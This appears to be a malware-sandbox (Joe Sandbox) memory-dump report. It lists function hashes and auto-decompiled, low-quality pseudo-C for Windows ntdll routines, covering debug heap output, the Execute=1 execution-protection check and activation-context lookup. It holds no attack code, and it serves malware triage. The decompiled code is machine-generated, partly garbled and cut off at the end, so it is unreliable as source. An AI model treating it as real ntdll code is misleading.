Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123999c8ff92bf6edb079e9438f36a24925f2baae69a2d21e6144bdff2fbb0e1
Instruction ID: 2270020b48081d8327fedfad7a8d5fd70e86a11d81d5741ff28dca61097ad1a6
Opcode Fuzzy Hash: 123999c8ff92bf6edb079e9438f36a24925f2baae69a2d21e6144bdff2fbb0e1
Instruction Fuzzy Hash: D790022524506102D550725C560461A400567E1201F51C826A4914555DC5A5885D7261

Uniqueness

Uniqueness Score: -1.00%

Function 328D29D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 829edd537b35a466f08102530ebf908781b899aaebd0bb1bf40e1e41ccc78450
Instruction ID: e5b74d95b87820aed78a1cf7b34d9926b1eaf377cd526593e90c2fa7654ef2c9
Opcode Fuzzy Hash: 829edd537b35a466f08102530ebf908781b899aaebd0bb1bf40e1e41ccc78450
Instruction Fuzzy Hash: 2C9002A5201150928900A3589604B0E450547E1201B51C81BE5154521CC5758859A175

Uniqueness

Uniqueness Score: -1.00%

Function 328D2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e38fc3dacf08badca65bad81097c17510021f0c84ab964b84458e40a42ffc8f1
Instruction ID: 1914114e81120a9de06a9f9e41db78a755c5a60040b370e4a12bf9e6d1b4a954
Opcode Fuzzy Hash: e38fc3dacf08badca65bad81097c17510021f0c84ab964b84458e40a42ffc8f1
Instruction Fuzzy Hash: 0090026521101042D5046258560470A004547E2201F51C817A6254515CC5798C696165

Uniqueness

Uniqueness Score: -1.00%

Function 328D2EC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25cfc66a846cf27ee958f5ca11d931ff123b36a6bab6f214192b9992a3528657
Instruction ID: 92068a40fda7c7312c54be1fde6bbf6193c344ec909190577fcb29adbdea5264
Opcode Fuzzy Hash: 25cfc66a846cf27ee958f5ca11d931ff123b36a6bab6f214192b9992a3528657
Instruction Fuzzy Hash: 7290023520141402D50062585A0874B000547D1302F51C816A9264516EC6B5C8997571

Uniqueness

Uniqueness Score: -1.00%

Function 328D2E00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e43d2f1009b16fef5a1df60fceec822f3401c25b16440ddd1e4a094580da2447
Instruction ID: e80dc65f15908502124fe33feb22f78c50a6685a4e3d57181cfb6c0aede34250
Opcode Fuzzy Hash: e43d2f1009b16fef5a1df60fceec822f3401c25b16440ddd1e4a094580da2447
Instruction Fuzzy Hash: 3B90026520141403D54066585A0460B000547D1302F51C816A6164516ECA798C597175

Uniqueness

Uniqueness Score: -1.00%

Function 328D2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e63e41d8a4c6e7b7aa342865b1d85a16215fcd40e01253202e78d8277e0da8c4
Instruction ID: bd12aa6eb9a3febac659c340beab3efdcae02b5f38f994c4c46088a2e6b40d15
Opcode Fuzzy Hash: e63e41d8a4c6e7b7aa342865b1d85a16215fcd40e01253202e78d8277e0da8c4
Instruction Fuzzy Hash: 2590022524101802D5407258961470B000687D1601F51C816A4124515DC666896D76F1

Uniqueness

Uniqueness Score: -1.00%

Function 328D2B20 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
Instruction ID: c3d9aa221953d091c38835bc86f040f9f4a3f11c5d8827b9111ea5b8d25530b9
Opcode Fuzzy Hash: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 3296A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3296A25D
RtlDebugPrintTimes.NTDLL ref: 3296A2F1
RtlDebugPrintTimes.NTDLL ref: 3296A314
RtlDebugPrintTimes.NTDLL ref: 3296A340
RtlDebugPrintTimes.NTDLL ref: 3296A415
RtlDebugPrintTimes.NTDLL ref: 3296A468
RtlDebugPrintTimes.NTDLL ref: 3296A487
RtlDebugPrintTimes.NTDLL ref: 3296A4B8

Strings

HEAP: , xrefs: 3296A206

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: 3603594ac1343d95ff671508f4462713c4370c7d379ee9d8820c45f23013b07d
Instruction ID: 81cda6ca14c91db8dd55b6e74e37b332203ae40a9a1c5ebdb1140889c484d6a7
Opcode Fuzzy Hash: 3603594ac1343d95ff671508f4462713c4370c7d379ee9d8820c45f23013b07d
Instruction Fuzzy Hash: 2FA17A757083128FE714CE18C894A2AB7E9FF88768F18496DE946DB311EB70EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 328C7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E328C7550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x3298b370 ^ _t107;
				_v8 =  *0x3298b370 ^ _t107;
				_t105 = __ecx;
				if( *0x32986664 == 0) {
					L5:
					return E328D4B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E3289E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E328C7738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E328C763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push("true");
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E328D2B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E328C76ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						L3291EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						L328D8F40( &_v548, 0, 0x214);
						_t106 =  *0x32986664;
						_t110 = _t108 + 0x20;
						 *0x329891e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x32986664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							L328D4C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						L3291EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E328DA9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							L3291EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E328DA690(_t106, "true");
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								L3291EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								L3290CC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						L3291EF10();
						goto L15;
					}
					L8:
					_t56 = E328C7648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x328c7560
0x328c7562
0x328c756f
0x328c7571
0x328c75ab
0x328c75b9
0x328c75b9
0x328c7579
0x328c7583
0x328c758f
0x32904443
0x328c7595
0x328c759e
0x328c759e
0x328c75a2
0x328c75bc
0x328c75c2
0x328c75c7
0x328c75c9
0x328c7621
0x328c7623
0x328c7624
0x328c75f8
0x328c75ff
0x328c7601
0x328c762c
0x328c7603
0x328c7609
0x328c7610
0x328c7612
0x328c7612
0x328c7612
0x328c7614
0x328c7616
0x328c7630
0x328c7633
0x328c7633
0x328c7618
0x328c761a
0x329045c9
0x329045c9
0x329045d1
0x329045d2
0x329045d4
0x329045d6
0x329045d6
0x00000000
0x328c761a
0x328c75ce
0x328c75d4
0x328c75da
0x328c75df
0x328c75e1
0x3290444a
0x32904450
0x00000000
0x00000000
0x32904456
0x32904469
0x32904476
0x32904486
0x3290448b
0x32904497
0x329044b9
0x329044bf
0x329044c1
0x329044c3
0x00000000
0x00000000
0x329044c9
0x329044cf
0x329044d1
0x00000000
0x00000000
0x329044dc
0x329044de
0x00000000
0x00000000
0x329044e6
0x329044ed
0x329044ef
0x329045c4
0x00000000
0x329045c4
0x329044f7
0x329044f8
0x32904510
0x32904515
0x32904524
0x3290452b
0x3290452c
0x3290452e
0x32904556
0x32904561
0x32904567
0x32904569
0x3290456c
0x3290456e
0x32904574
0x32904576
0x00000000
0x00000000
0x00000000
0x00000000
0x3290457c
0x3290457c
0x32904584
0x32904588
0x3290458a
0x3290458c
0x3290458e
0x3290458e
0x3290459b
0x329045a0
0x329045a7
0x329045ac
0x329045ae
0x00000000
0x00000000
0x329045b4
0x329045b4
0x329045b7
0x329045b7
0x00000000
0x329045bf
0x32904530
0x32904535
0x32904537
0x32904539
0x00000000
0x3290453e
0x328c75e7
0x328c75e9
0x328c75ee
0x328c75f0
0x00000000
0x00000000
0x328c75f2
0x00000000
0x328c75a4
0x328c75a4
0x328c75a4
0x00000000
0x328c75a4

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32904507
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32904530
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32904460
Execute=1, xrefs: 3290451E
ExecuteOptions, xrefs: 329044AB
CLIENT(ntdll): Processing section info %ws..., xrefs: 32904592
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3290454D

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 98012f548cd883934a9fc31942facae91a3080dc6b59833a3cc728bfb15e1f29
Instruction ID: 5a1d8b55199a054b7f44a082dd8c3f95782e5600a92a50559f17ed98864e97d7
Opcode Fuzzy Hash: 98012f548cd883934a9fc31942facae91a3080dc6b59833a3cc728bfb15e1f29
Instruction Fuzzy Hash: 6B51F9B9A0032DAEEB149BA9DC95FADB3ACEF04344F4404E9D919A7281DB70DA45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 328AA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E328AA170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v85;
				void* _v88;
				void* _v96;
				void* _v109;
				intOrPtr _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr _t135;
				void* _t136;
				intOrPtr _t145;
				intOrPtr _t151;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t202;
				void* _t203;
				signed char _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				signed int _t219;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t234;
				void* _t236;
				signed int _t240;
				void* _t242;

				_t178 =  *[fs:0x18];
				_t242 = (_t240 & 0xfffffff8) - 0x3c;
				_t128 =  *((intOrPtr*)(_t178 + 0x30));
				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t129 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v36 = 0xffffffff;
					_v40 = 0;
					if(_a16 == 0) {
						L83:
						_t129 = 0xc000000d;
						goto L33;
					} else {
						_t213 = _a4;
						if((_t213 & 0xfffffff8) != 0) {
							goto L83;
						} else {
							_t130 = _a20;
							if((_t213 & 0x00000007) == 0) {
								if(_t130 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t130 == 0) {
									goto L83;
								} else {
									L5:
									if( *_t130 < 0x24) {
										goto L83;
									} else {
										L6:
										if((_t213 & 0x00000002) == 0) {
											L9:
											if((_t213 & 0x00000004) != 0) {
												if(_t130 + 0x40 <=  *_t130 + _t130) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L82;
												}
											} else {
												L10:
												_t233 = _a8;
												_v24 = _t213;
												_t214 =  *[fs:0x18];
												_v16 = _a12;
												_v12 = 0;
												_t172 = _v12;
												_t181 =  *((intOrPtr*)(_t214 + 0x30));
												_v28 = 0x18;
												_v8 = 0;
												_v20 = _a8;
												_v60 = 0;
												_v52 = _t214;
												_v44 = _t181;
												while(1) {
													_t135 = _t172;
													if(_t135 != 0) {
														goto L34;
													}
													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
													if(_t164 == 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
														_v60 = 0;
														if(_t228 == 0) {
															L36:
															_t228 =  *((intOrPtr*)(_t181 + 0x200));
															_v60 = 0xfffffffc;
															if(_t228 == 0) {
																L87:
																if(_t172 <= 3) {
																	goto L16;
																} else {
																	_t129 = 0xc00000e5;
																	goto L90;
																}
															} else {
																_t172 = 3;
																_v12 = 3;
																goto L16;
															}
														} else {
															_t172 = 2;
															_v12 = 2;
															goto L16;
														}
													} else {
														_t165 =  *_t164;
														if(_t165 != 0) {
															_t166 =  *((intOrPtr*)(_t165 + 4));
															_v60 = _t166;
															if(_t166 != 0) {
																if(_t166 == 0xfffffffc) {
																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
																	goto L56;
																} else {
																	if(_t166 == 0xfffffffd) {
																		_t228 = "Actx ";
																		goto L57;
																	} else {
																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
																		goto L56;
																	}
																}
															} else {
																L56:
																if(_t228 == 0) {
																	goto L14;
																} else {
																	L57:
																	_t172 = 1;
																	_v12 = 1;
																	L16:
																	if(_t228 == 0) {
																		_t129 = 0xc0150001;
																		L90:
																		_t234 = 0;
																		goto L91;
																	} else {
																		_t129 = E328AA600(_t228, _t233, _a12,  &_v56,  &_v48);
																		if(_t129 < 0) {
																			_t234 = 0;
																			if(_t129 != 0xc0150001 || _t172 == 3) {
																				goto L19;
																			} else {
																				_t181 = _v44;
																				_t214 = _v52;
																				_t233 = _a8;
																				continue;
																			}
																		} else {
																			_t224 = _v60;
																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
																			asm("sbb esi, esi");
																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
																			_t129 = 0;
																			L19:
																			if(_t129 < 0) {
																				L91:
																				if(_t129 < 0) {
																					goto L33;
																				} else {
																					goto L20;
																				}
																			} else {
																				L20:
																				_t173 = _v48;
																				if(_t173 < 0x2c) {
																					L110:
																					_t138 = _v56;
																					goto L111;
																				} else {
																					_t229 = _a20;
																					while(1) {
																						L22:
																						_t138 = _v56;
																						if( *_v56 != 0x64487353) {
																							break;
																						}
																						_t242 = _t242 - 8;
																						_t129 = E328AA760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
																						if(_t129 >= 0) {
																							_t83 = _t234 - 1; // -1
																							if((_t83 | 0x00000007) != 0xffffffff) {
																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
																								_v40 = _t145;
																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
																									 *((char*)(_t242 + 0xf)) = 0;
																									 *0x329891e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
																									_v40();
																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
																									if( *((char*)(_t242 + 0xf)) != 0) {
																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
																									}
																								}
																							}
																							if(_t229 == 0) {
																								L67:
																								return 0;
																							} else {
																								_t129 = E32894428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
																								if(_t129 < 0) {
																									goto L33;
																								} else {
																									goto L67;
																								}
																							}
																						} else {
																							if(_t129 != 0xc0150008) {
																								L33:
																								return _t129;
																							} else {
																								_t217 =  *[fs:0x18];
																								_t234 = 0;
																								_v68 = 0;
																								_v40 = _t217;
																								_v60 = 0;
																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
																								_t176 = _v20;
																								L26:
																								while(1) {
																									if(_t176 <= 2) {
																										_t190 = _t176 - _t234;
																										if(_t190 == 0) {
																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
																											if(_t191 == 0) {
																												goto L68;
																											} else {
																												_t201 =  *_t191;
																												if(_t201 == 0) {
																													goto L68;
																												} else {
																													_t202 =  *((intOrPtr*)(_t201 + 4));
																													_v60 = _t202;
																													if(_t202 == 0) {
																														L102:
																														if(_t151 == 0) {
																															goto L68;
																														} else {
																															goto L103;
																														}
																													} else {
																														if(_t202 != 0xfffffffc) {
																															if(_t202 != 0xfffffffd) {
																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
																																goto L101;
																															} else {
																																_t151 = "Actx ";
																																_v68 = _t151;
																																L103:
																																_t176 = 1;
																																_v20 = 1;
																																goto L28;
																															}
																														} else {
																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
																															L101:
																															_v68 = _t151;
																															goto L102;
																														}
																													}
																												}
																											}
																										} else {
																											_t203 = _t190 - 1;
																											if(_t203 == 0) {
																												L68:
																												_v60 = 0;
																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
																												_v68 = _t151;
																												if(_t151 == 0) {
																													goto L44;
																												} else {
																													_t176 = 2;
																													_v20 = 2;
																													goto L28;
																												}
																											} else {
																												if(_t203 != 1) {
																													goto L27;
																												} else {
																													L44:
																													_v60 = 0xfffffffc;
																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
																													_v68 = _t151;
																													if(_t151 == 0) {
																														goto L27;
																													} else {
																														_t176 = 3;
																														_v20 = 3;
																														goto L28;
																													}
																												}
																											}
																										}
																									} else {
																										L27:
																										if(_t176 > 3) {
																											_t129 = 0xc00000e5;
																											goto L30;
																										} else {
																											L28:
																											if(_t151 != 0) {
																												_t129 = E328AA600(_t151, _a8, _a12,  &_v64,  &_v56);
																												if(_t129 < 0) {
																													_t219 = 0;
																													if(_t129 != 0xc0150001 || _t176 == 3) {
																														goto L48;
																													} else {
																														_t151 = _v68;
																														_t217 = _v40;
																														continue;
																													}
																												} else {
																													_t177 = _v60;
																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
																													asm("sbb edx, edx");
																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
																													_t129 = 0;
																													L48:
																													if(_t129 < 0) {
																														goto L31;
																													} else {
																														if(_t219 != 0) {
																															_t125 = _t219 - 1; // -1
																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
																																while(1) {
																																	_t236 =  *_t219;
																																	if(_t236 == 0x7fffffff) {
																																		goto L50;
																																	}
																																	asm("lock cmpxchg [edx], ecx");
																																	if(_t236 != _t236) {
																																		continue;
																																	} else {
																																		goto L50;
																																	}
																																	goto L112;
																																}
																															}
																														}
																														L50:
																														_t234 = _t219;
																														goto L51;
																													}
																												}
																											} else {
																												_t129 = 0xc0150001;
																												L30:
																												if(_t129 >= 0) {
																													L51:
																													_t173 = _v56;
																													if(_t173 >= 0x2c) {
																														goto L22;
																													} else {
																														goto L110;
																													}
																												} else {
																													L31:
																													if(_t129 == 0xc0150001) {
																														_t129 = 0xc0150008;
																													}
																													goto L33;
																												}
																											}
																										}
																									}
																									goto L112;
																								}
																							}
																						}
																						goto L112;
																					}
																					L111:
																					_push(_t173);
																					L3291EF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
																					_t129 = 0xc0150003;
																					goto L33;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L112;
													L34:
													_t136 = _t135 - 1;
													if(_t136 == 0) {
														goto L14;
													} else {
														if(_t136 != 1) {
															goto L87;
														} else {
															goto L36;
														}
													}
													goto L112;
												}
											}
										} else {
											if(_t130 + 0x2c >  *_t130 + _t130) {
												_push(0xc000000d);
												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L82:
												_push(0);
												_push(0x33);
												L3291EF10();
												goto L83;
											} else {
												_t130 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L112:
			}

0x328aa178
0x328aa17f
0x328aa182
0x328aa18f
0x328aa4b4
0x00000000
0x328f77ce
0x328f77ce
0x00000000
0x328f77ce
0x328aa195
0x328aa195
0x328aa199
0x328aa1a1
0x328aa1a9
0x328aa1b1
0x328f77f3
0x328f77f3
0x00000000
0x328aa1b7
0x328aa1b7
0x328aa1c0
0x00000000
0x328aa1c6
0x328aa1c6
0x328aa1cc
0x328aa5dc
0x00000000
0x328aa5e2
0x00000000
0x328aa5e2
0x328aa1d2
0x328aa1d4
0x00000000
0x328aa1da
0x328aa1da
0x328aa1dd
0x00000000
0x328aa1e3
0x328aa1e3
0x328aa1e6
0x328aa1fa
0x328aa1fd
0x328aa5f0
0x00000000
0x328aa5f6
0x328f77fd
0x328f7802
0x328f7807
0x00000000
0x328f7807
0x328aa203
0x328aa203
0x328aa208
0x328aa20b
0x328aa20f
0x328aa216
0x328aa21c
0x328aa224
0x328aa228
0x328aa22b
0x328aa233
0x328aa23b
0x328aa23f
0x328aa243
0x328aa247
0x328aa250
0x328aa252
0x328aa255
0x00000000
0x00000000
0x328aa25b
0x328aa263
0x328aa26f
0x328aa26f
0x328aa277
0x328aa27d
0x328aa3ae
0x328aa3ae
0x328aa3b4
0x328aa3be
0x328f7823
0x328f7826
0x00000000
0x328f782c
0x328f782c
0x00000000
0x328f782c
0x328aa3c4
0x328aa3c4
0x328aa3c9
0x00000000
0x328aa3c9
0x328aa283
0x328aa283
0x328aa288
0x00000000
0x328aa288
0x328aa265
0x328aa265
0x328aa269
0x328aa4bf
0x328aa4c2
0x328aa4c8
0x328aa4e3
0x328f780e
0x00000000
0x328aa4e9
0x328aa4ec
0x328f7819
0x00000000
0x328aa4f2
0x328aa4f2
0x00000000
0x328aa4f2
0x328aa4ec
0x328aa4ca
